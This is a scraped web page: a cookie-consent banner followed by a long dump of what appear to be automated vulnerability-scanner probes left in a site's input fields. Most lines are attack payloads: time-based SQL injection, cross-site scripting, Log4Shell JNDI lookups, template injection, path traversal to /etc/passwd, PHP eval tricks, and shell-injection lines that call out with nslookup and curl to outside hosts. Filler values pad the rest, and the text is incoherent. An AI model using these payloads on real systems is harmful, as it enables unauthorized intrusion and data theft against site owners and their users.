Your privacy is important to us.
We use technologies, such as cookies, that gather information on our website. That information is used for a variety of purposes such as to understand how visitors interact with our websites, or to serve advertisements on our websites or on other websites. The use of technologies, such as cookies, constitutes a “sale” of personal information under the California Consumer Privacy Act. You can stop the use of certain third party tracking technologies that are not considered our service providers by clicking on the “Do Not Sell or Share My Personal Information” link at the bottom of our website and selecting your preferences below, or broadcasting the global privacy control signal. Note that due to technological limitations, if you visit our website from a different computer or device, or clear cookies on your browser that store your preferences, you will need to return to this screen to select your preferences and/or rebroadcast the signal. You can find a description of the types of tracking technologies, and your options with respect to those technologies, below.
Required cookies keep our site working. These cookies are necessary for our website to function. For example, required cookies are used when saving your settings and preferences, when you log in and out of your account, and for other basic site functions. These cookies cannot be disabled.
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Advertising cookies are used to provide you with a personalized experience. These cookies may be set by our advertising partners to build a profile of your interests. If you do not allow these cookies to be used, either by your browser settings or if you select "No (Opt-Out)" in the toggle above, you will experience less targeted advertising from our partners. Note that if you select “do not allow advertising cookies” we may still use third party tracking technology from companies that have contractually agreed to limit their use, storage, and disclosure of collected information to serving Sephora-specific advertisements.
The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.
1
555
555
555
555
-1 OR 2+243-243-1=0+0+0+1
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-5 OR 112=(SELECT 112 FROM PG_SLEEP(15))–
555
555
“+response.write(9525935*9801985)+”
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
dv7VNL4P’ OR 112=(SELECT 112 FROM PG_SLEEP(15))–
‘+’A’.concat(70-3).concat(22*4).concat(114).concat(71).concat(112).concat(66)+(require’socket’
Socket.gethostbyname(‘hitqz’+’myndpsxu2aba0.bxss.me.’)[3].to_s)+’
555
1
1
555
1mTXF54t
if(now()=sysdate(),sleep(15),0)
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-1; waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
-5 OR 293=(SELECT 293 FROM PG_SLEEP(15))–
-1)) OR 102=(SELECT 102 FROM PG_SLEEP(15))–
Gc32fiZE’) OR 654=(SELECT 654 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1′”
1
1
1
1
1
1
1
1
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
-1; waitfor delay ‘0:0:15’ —
vAidXu6V’) OR 408=(SELECT 408 FROM PG_SLEEP(15))–
NcgENXzk’)) OR 150=(SELECT 150 FROM PG_SLEEP(15))–
555
1
1
1
1
1
1
1
1BcAxI6lS4O
1ckZ5Av0B
${j${::-n}di:dns${::-:}${::-/}${::-/}hitgogtgrpocb2a214${::-.}bxss.me}zzzz${url:UTF-8:http://hitrvkkjcjtrp.bxss.me/}
1*1
1*207*202*0
1+196-191-5
-1 OR 3+218-218-1=0+0+0+1
1
1
10’XOR(1*if(now()=sysdate(),sleep(15),0))XOR’Z
10″XOR(1*if(now()=sysdate(),sleep(15),0))XOR”Z
1-1; waitfor delay ‘0:0:15’ —
1ISG6K4HG’; waitfor delay ‘0:0:15’ —
1-1 OR 730=(SELECT 730 FROM PG_SLEEP(15))–
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
1
555
1
555
555
555
bxss.me/t/xss.html?%00
5559798978
555
1}}”}}’}}1%>”%>’%>
1
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
5551QJDE[!+!]
555aD0Q(9715)
555aD0Q(9320)9320
555ctbkaddF
555*1
555+40-35-5
555*797*792*0
-1 OR 2+324-324-1=0+0+0+1
555c7h1q
aD0Q(9635)
-1 OR 3*2>(0+5+324-324)
1
555*if(now()=sysdate(),sleep(15),0)
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1); waitfor delay ‘0:0:15’ —
1′”()&%S85F(9003)
555-1) OR 45=(SELECT 45 FROM PG_SLEEP(15))–
555-1)) OR 845=(SELECT 845 FROM PG_SLEEP(15))–
555pPukefhz’ OR 755=(SELECT 755 FROM PG_SLEEP(15))–
555WnompNll’) OR 72=(SELECT 72 FROM PG_SLEEP(15))–
555icmWGZBN’)) OR 476=(SELECT 476 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
1′”()&%54fQ(9033)
‘”()&%Ms9o(9298)
19079647
bfg8151%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8151
bfgx9415%C0%BEz1%C0%BCz2a%90bcxhjl9415
<th:t="${dfb}#foreach
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
1Ms9o(9537)
1GNTYR[!+!]
1Ms9o(9416)
1Ms9o(9817)9817
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4D%73%39%6F%28%39%35%37%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1Ms9o(9873)
1″ onerror=alert(9261)>
%31%3C%53%63%52%69%50%74%20%3E%4D%73%39%6F%289741%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\Ms9o(9078)\u003C/sCripT\u003E
1<ScRiPt>Ms9o(9883)</sCripT>
1}body{zzz:Expre/**/SSion(Ms9o(9495))}
1MCLXL[!+!]
1<img sRc='http://attacker-9740/log.php?
1<aAuFUHO<
1′”()&%Nbgv(9322)
‘”()&%Nbgv(9591)
19023085
bfg8859%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl8859
bfgx9347%C0%BEz1%C0%BCz2a%90bcxhjl9347
1Nbgv(9326)
1YPINT[!+!]
1Nbgv(9108)
1Nbgv(9780)9780
1Nbgv(9494)
1Nbgv(9092)
1″ onerror=alert(9673)>
1\u003CScRiPt\Nbgv(9468)\u003C/sCripT\u003E
1<ScRiPt>Nbgv(9139)</sCripT>
1}body{zzz:Expre/**/SSion(Nbgv(9716))}
1G3tbb
Nbgv(9340)
1CIIBV[!+!]
1<img sRc='http://attacker-9635/log.php?
1<aBilomz<
1′”()&%8FCH(9894)
19684675
bfg10466%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10466
18FCH(9402)
1HVCJI[!+!]
18FCH(9186)9186
18FCH(9942)
18FCH(9321)
1″ onerror=alert(9207)>
1\u003CScRiPt\8FCH(9225)\u003C/sCripT\u003E
101Ayo
8FCH(9531)
1DEFO9[!+!]
1<img sRc='http://attacker-9494/log.php?
1<aFyazhN<
1′”()&%P6Bt(9854)
‘”()&%P6Bt(9771)
19457000
bfg9852%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9852
1P6Bt(9577)
1BDKTD[!+!]
1P6Bt(9004)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%50%36%42%74%28%39%38%37%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1P6Bt(9131)
1P6Bt(9467)
1″ onerror=alert(9925)>
1\u003CScRiPt\P6Bt(9709)\u003C/sCripT\u003E
1<ScRiPt>P6Bt(9357)</sCripT>
1}body{zzz:Expre/**/SSion(P6Bt(9978))}
1xjs53
P6Bt(9727)
1DEGOI[!+!]
1<img sRc='http://attacker-9301/log.php?
1′”()&%8GU1(9698)
‘”()&%8GU1(9872)
19534084
bfg3738%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3738
bfgx10387%C0%BEz1%C0%BCz2a%90bcxhjl10387
18GU1(9617)
18GU1(9657)
18GU1(9036)9036
18GU1(9317)
18GU1(9797)
1″ onerror=alert(9378)>
1\u003CScRiPt\8GU1(9252)\u003C/sCripT\u003E
12ivJf
8GU1(9986)
1<img sRc='http://attacker-9078/log.php?
1′”()&%SSIH(9371)
‘”()&%SSIH(9693)
19046468
bfg4350%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4350
bfgx7577%C0%BEz1%C0%BCz2a%90bcxhjl7577
1SSIH(9178)
1SSIH(9755)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%53%49%48%28%39%32%38%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1SSIH(9199)
1″ onerror=alert(9341)>
1\u003CScRiPt\SSIH(9410)\u003C/sCripT\u003E
1<ScRiPt>SSIH(9727)</sCripT>
1}body{zzz:Expre/**/SSion(SSIH(9540))}
1MZW5F[!+!]
1<img sRc='http://attacker-9703/log.php?
1<aGBAZux<
1′”()&%Gzfb(9916)
19318408
bfg9314%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9314
1Gzfb(9326)
1Gzfb(9093)
1Gzfb(9501)9501
1Gzfb(9552)
1Gzfb(9080)
1″ onerror=alert(9635)>
1\u003CScRiPt\Gzfb(9308)\u003C/sCripT\u003E
1}body{zzz:Expre/**/SSion(Gzfb(9662))}
1BKDUR[!+!]
1<img sRc='http://attacker-9403/log.php?
1
555
1|echo vbgjji$()\ bdiqxx\nz^xyu||a #’ |echo vbgjji$()\ bdiqxx\nz^xyu||a #|” |echo vbgjji$()\ bdiqxx\nz^xyu||a #
1′”()&%whXn(9056)
1
?'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hiteshpboodlgafe6b${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bxss.me/t/xss.html?%00
555
555|echo cqrmvr$()\ gfhybe\nz^xyu||a #’ |echo cqrmvr$()\ gfhybe\nz^xyu||a #|” |echo cqrmvr$()\ gfhybe\nz^xyu||a #
1GCM5SeBk’)) OR 494=(SELECT 494 FROM PG_SLEEP(15))–
555
555
555sWyxAIJq
555*if(now()=sysdate(),sleep(15),0)
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1); waitfor delay ‘0:0:15’ —
555-1 OR 638=(SELECT 638 FROM PG_SLEEP(15))–
1
555fKCTaZLz’)) OR 792=(SELECT 792 FROM PG_SLEEP(15))–
555%2527%2522\’\”
1
1
555
1
555
1
$(nslookup -q=cname hitrbsskpwkmt63869.bxss.me||curl hitrbsskpwkmt63869.bxss.me)
`(nslookup -q=cname hitynfanjdytyb35fd.bxss.me||curl hitynfanjdytyb35fd.bxss.me)`
1
1
1
1
10’XOR(1*if(now()=sysdate(),sleep(15),0))XOR’Z
1
1
1
1
1
1
1
1-1 OR 704=(SELECT 704 FROM PG_SLEEP(15))–
1-1)) OR 119=(SELECT 119 FROM PG_SLEEP(15))–
555
555
555′>”>
555
1
555
555
echo taydjs$()\ nhgvyc\nz^xyu||a #’ &echo taydjs$()\ nhgvyc\nz^xyu||a #|” &echo taydjs$()\ nhgvyc\nz^xyu||a #
1
;(nslookup -q=cname hitnswjffoeizec604.bxss.me||curl hitnswjffoeizec604.bxss.me)|(nslookup -q=cname hitnswjffoeizec604.bxss.me||curl hitnswjffoeizec604.bxss.me)&(nslookup -q=cname hitnswjffoeizec604.bxss.me||curl hitnswjffoeizec604.bxss.me)
555
555Ppqh7mln
555*1
555+584-579-5
555+858-853-5
555+34-29-5
555*if(now()=sysdate(),sleep(15),0)
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1
1
555-1 OR 137=(SELECT 137 FROM PG_SLEEP(15))–
1
555-1) OR 194=(SELECT 194 FROM PG_SLEEP(15))–
555-1)) OR 33=(SELECT 33 FROM PG_SLEEP(15))–
5550z8mfK8H’ OR 634=(SELECT 634 FROM PG_SLEEP(15))–
555VvrWSMjv’) OR 375=(SELECT 375 FROM PG_SLEEP(15))–
555Chi7QRua’)) OR 363=(SELECT 363 FROM PG_SLEEP(15))–
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1
1
1
555
cw02kJ2b
555
555
‘;print(md5(31337));$a=’
555
555
555
hpZ76FsE
1*555
(761-201-5)
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
hFrKaDQ3′; waitfor delay ‘0:0:15’ —
-1)) OR 111=(SELECT 111 FROM PG_SLEEP(15))–
5FhqyL9U’)) OR 826=(SELECT 826 FROM PG_SLEEP(15))–
1′”
1
555
$(nslookup -q=cname hitshmhmfixkv37428.bxss.me||curl hitshmhmfixkv37428.bxss.me)
`(nslookup -q=cname hitcnommnrfde2218d.bxss.me||curl hitcnommnrfde2218d.bxss.me)`
-1 OR 2+449-449-1=0+0+0+1
1
1-1); waitfor delay ‘0:0:15’ —
1-1 waitfor delay ‘0:0:15’ —
1-1 OR 730=(SELECT 730 FROM PG_SLEEP(15))–
1-1)) OR 607=(SELECT 607 FROM PG_SLEEP(15))–
1Y0DnbhGP’)) OR 165=(SELECT 165 FROM PG_SLEEP(15))–
1′”
555
555
|echo lrrzne$()\ bgtfyb\nz^xyu||a #’ |echo lrrzne$()\ bgtfyb\nz^xyu||a #|” |echo lrrzne$()\ bgtfyb\nz^xyu||a #
&(nslookup -q=cname hitymdiypvyak12cd6.bxss.me||curl hitymdiypvyak12cd6.bxss.me)&’\”`0&(nslookup -q=cname hitymdiypvyak12cd6.bxss.me||curl hitymdiypvyak12cd6.bxss.me)&`’
555
555
555
555*1
1
1
555-1; waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
555MArcZECJ’; waitfor delay ‘0:0:15’ —
555-1 OR 753=(SELECT 753 FROM PG_SLEEP(15))–
555-1) OR 244=(SELECT 244 FROM PG_SLEEP(15))–
555-1)) OR 617=(SELECT 617 FROM PG_SLEEP(15))–
555LpdxocPd’ OR 391=(SELECT 391 FROM PG_SLEEP(15))–
1
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555%2527%2522\’\”
1
1′”()&%8QvN(9310)
19334820
1wfFO1sWU
1′>”>
1*1
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%38%51%76%4E%28%39%36%33%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
555
555
555
555
1<img sRc='http://attacker-9902/log.php?
1
555
555
555
555
555
5558faqKJc3
555*291*286*0
555+793-788-5
555+583-578-5
-1 OR 3+663-663-1=0+0+0+1
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1 waitfor delay ‘0:0:15’ —
555iSIPFODM’; waitfor delay ‘0:0:15’ —
555-1 OR 126=(SELECT 126 FROM PG_SLEEP(15))–
555-1) OR 545=(SELECT 545 FROM PG_SLEEP(15))–
555-1)) OR 590=(SELECT 590 FROM PG_SLEEP(15))–
1
555p1jskYSr’) OR 118=(SELECT 118 FROM PG_SLEEP(15))–
1
1
555′”
1
1
1
1
1
1
1
555
555
555
(nslookup -q=cname hitsoterrqleo00479.bxss.me||curl hitsoterrqleo00479.bxss.me))
)
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1)) OR 374=(SELECT 374 FROM PG_SLEEP(15))–
555
555
<!–
1
1mpHreLhLO
555
1oKgR9jR2
1*1
555
555
555
555
555
echo kfkfeb$()\ shrfyo\nz^xyu||a #’ &echo kfkfeb$()\ shrfyo\nz^xyu||a #|” &echo kfkfeb$()\ shrfyo\nz^xyu||a #
&echo cptljt$()\ amakyc\nz^xyu||a #’ &echo cptljt$()\ amakyc\nz^xyu||a #|” &echo cptljt$()\ amakyc\nz^xyu||a #
555
../555
555
1-1); waitfor delay ‘0:0:15’ —
555
555
1ZxdQpISU’; waitfor delay ‘0:0:15’ —
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1IQt3nvGf’) OR 421=(SELECT 421 FROM PG_SLEEP(15))–
555*1
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
555-1; waitfor delay ‘0:0:15’ —
555
555-1 OR 669=(SELECT 669 FROM PG_SLEEP(15))–
555KprxD1vu’ OR 868=(SELECT 868 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555′”
555
wp-comments-post.php
555
xfs.bxss.me
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
&nslookup -q=cname hituooskimyubd782a.bxss.me&’\”`0&nslookup -q=cname hituooskimyubd782a.bxss.me&`’
&(nslookup -q=cname hitbngucxdbwcc1698.bxss.me||curl hitbngucxdbwcc1698.bxss.me)&’\”`0&(nslookup -q=cname hitbngucxdbwcc1698.bxss.me||curl hitbngucxdbwcc1698.bxss.me)&`’
1
555
1
1
)
1
1
1
1
1
1
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
1
1
1
1
1
555
1
1
1
555
1′”()&%pg9n(9353)
555′”()&%JPzh(9284)
‘”()&%JPzh(9137)
555
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
555
response.write(9392187*9564081)
555
555
555
555
555
555
555
555
555
555
555
555
555*1
555*if(now()=sysdate(),sleep(15),0)
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1; waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
555-1 waitfor delay ‘0:0:15’ —
555wa45SZfQ’; waitfor delay ‘0:0:15’ —
555-1 OR 685=(SELECT 685 FROM PG_SLEEP(15))–
555-1) OR 201=(SELECT 201 FROM PG_SLEEP(15))–
555-1)) OR 775=(SELECT 775 FROM PG_SLEEP(15))–
555ldEBpTbC’ OR 702=(SELECT 702 FROM PG_SLEEP(15))–
555wjKio5hU’) OR 919=(SELECT 919 FROM PG_SLEEP(15))–
55531n4quat’)) OR 934=(SELECT 934 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
1 waitfor delay ‘0:0:15’ —
-5) OR 375=(SELECT 375 FROM PG_SLEEP(15))–
TdzrQd0n’) OR 731=(SELECT 731 FROM PG_SLEEP(15))–
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
NfafrmnW
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
-5) OR 104=(SELECT 104 FROM PG_SLEEP(15))–
g5qjw69O’ OR 746=(SELECT 746 FROM PG_SLEEP(15))–
-1; waitfor delay ‘0:0:15’ —
-1)) OR 223=(SELECT 223 FROM PG_SLEEP(15))–
-5) OR 988=(SELECT 988 FROM PG_SLEEP(15))–
18RxB825′ OR 394=(SELECT 394 FROM PG_SLEEP(15))–
1
1
1
555
if(now()=sysdate(),sleep(15),0)
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-1; waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
-5 OR 255=(SELECT 255 FROM PG_SLEEP(15))–
-1)) OR 622=(SELECT 622 FROM PG_SLEEP(15))–
C0J0qxSr’)) OR 21=(SELECT 21 FROM PG_SLEEP(15))–
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
/etc/shells
555
echo qmdaun$()\ swcyjj\nz^xyu||a #’ &echo qmdaun$()\ swcyjj\nz^xyu||a #|” &echo qmdaun$()\ swcyjj\nz^xyu||a #
../555
555
555
555
555
-1 OR 3+532-532-1=0+0+0+1
DC816NoA
if(now()=sysdate(),sleep(15),0)
-1; waitfor delay ‘0:0:15’ —
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
-5) OR 514=(SELECT 514 FROM PG_SLEEP(15))–
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
N2u6v3Ra’) OR 973=(SELECT 973 FROM PG_SLEEP(15))–
1
555
555
555
555
555
555
555
555
555
555
Bx7E4m20
1*555
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
J3xn6aR5′; waitfor delay ‘0:0:15’ —
-5 OR 486=(SELECT 486 FROM PG_SLEEP(15))–
-5) OR 427=(SELECT 427 FROM PG_SLEEP(15))–
-1)) OR 245=(SELECT 245 FROM PG_SLEEP(15))–
qBBNIlLF’ OR 154=(SELECT 154 FROM PG_SLEEP(15))–
oIUaCGpA’) OR 563=(SELECT 563 FROM PG_SLEEP(15))–
rm4212xe’)) OR 669=(SELECT 669 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
1*555
555*684*679*0
-1 OR 2+59-59-1=0+0+0+1
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1 waitfor delay ‘0:0:15’ —
5b05il7i’; waitfor delay ‘0:0:15’ —
-5 OR 547=(SELECT 547 FROM PG_SLEEP(15))–
-5) OR 840=(SELECT 840 FROM PG_SLEEP(15))–
-1)) OR 79=(SELECT 79 FROM PG_SLEEP(15))–
V4GPCFrm’ OR 952=(SELECT 952 FROM PG_SLEEP(15))–
1%2527%2522
555
555
555
&echo yjkyby$()\ xxfzad\nz^xyu||a #’ &echo yjkyby$()\ xxfzad\nz^xyu||a #|” &echo yjkyby$()\ xxfzad\nz^xyu||a #
555
555
555
555
555
555
555
555
k9DsSURs
555*571*566*0
555*42*37*0
-1); waitfor delay ‘0:0:15’ —
fABO9FnQ’; waitfor delay ‘0:0:15’ —
-5 OR 617=(SELECT 617 FROM PG_SLEEP(15))–
-1)) OR 856=(SELECT 856 FROM PG_SLEEP(15))–
2QqUoVMn’) OR 257=(SELECT 257 FROM PG_SLEEP(15))–
ppIOSK3r’)) OR 751=(SELECT 751 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
http://bxss.me/t/xss.html?%00
555
‘”()&%Ifg2(9341)
555
1
555
555
555′”()&%PEzx(9054)
555
555dxRJf66v
555*1
555
-1 OR 3+699-699-1=0+0+0+1
555
555
555
555
555
555-1 waitfor delay ‘0:0:15’ —
555WnXqCKgY’; waitfor delay ‘0:0:15’ —
555-1 OR 753=(SELECT 753 FROM PG_SLEEP(15))–
555+490-485-5
555*615*610*0
555+811-806-5
555*if(now()=sysdate(),sleep(15),0)
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1; waitfor delay ‘0:0:15’ —
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
@@KWnjZ
555
555
555-1) OR 35=(SELECT 35 FROM PG_SLEEP(15))–
555-1)) OR 274=(SELECT 274 FROM PG_SLEEP(15))–
555ycDYAinx’ OR 951=(SELECT 951 FROM PG_SLEEP(15))–
555eLYu9IVc’) OR 65=(SELECT 65 FROM PG_SLEEP(15))–
555′”
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
?'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitibmwjwgpmg58a3d${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
555
555
555
echo efjxsu$()\ kvmftb\nz^xyu||a #’ &echo efjxsu$()\ kvmftb\nz^xyu||a #|” &echo efjxsu$()\ kvmftb\nz^xyu||a #
$(nslookup -q=cname hityvclzgvwycd2188.bxss.me||curl hityvclzgvwycd2188.bxss.me)
;(nslookup -q=cname hitwhkgwhcazgd96b9.bxss.me||curl hitwhkgwhcazgd96b9.bxss.me)|(nslookup -q=cname hitwhkgwhcazgd96b9.bxss.me||curl hitwhkgwhcazgd96b9.bxss.me)&(nslookup -q=cname hitwhkgwhcazgd96b9.bxss.me||curl hitwhkgwhcazgd96b9.bxss.me)
555
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.462-36983.462.a50ac${::-.}1${::-.}bxss.me}}
555
555
555
`(nslookup -q=cname hitwjsawwewhle75ae.bxss.me||curl hitwjsawwewhle75ae.bxss.me)`
555
555PRrzniV5
555r6nSF84t
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1); waitfor delay ‘0:0:15’ —
555L9zCKx8k’; waitfor delay ‘0:0:15’ —
555-1 waitfor delay ‘0:0:15’ —
555-1 OR 519=(SELECT 519 FROM PG_SLEEP(15))–
555-1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))–
555′”
1
555
555
555
?'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitbugmqiwurh24696${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
555
555
555
555
555
555
555
555&echo atkuvt$()\ undxwa\nz^xyu||a #’ &echo atkuvt$()\ undxwa\nz^xyu||a #|” &echo atkuvt$()\ undxwa\nz^xyu||a #
&nslookup -q=cname hitdinzctvnpy59738.bxss.me&’\”`0&nslookup -q=cname hitdinzctvnpy59738.bxss.me&`’
555
555
555
555
555
555
555
555
555
555
-1 OR 2+155-155-1=0+0+0+1
555*if(now()=sysdate(),sleep(15),0)
555
555-1; waitfor delay ‘0:0:15’ —
555-1 waitfor delay ‘0:0:15’ —
555*1
555-1 OR 482=(SELECT 482 FROM PG_SLEEP(15))–
555+803-798-5
555WOPTulxD’ OR 943=(SELECT 943 FROM PG_SLEEP(15))–
555oF7BwhCl’) OR 424=(SELECT 424 FROM PG_SLEEP(15))–
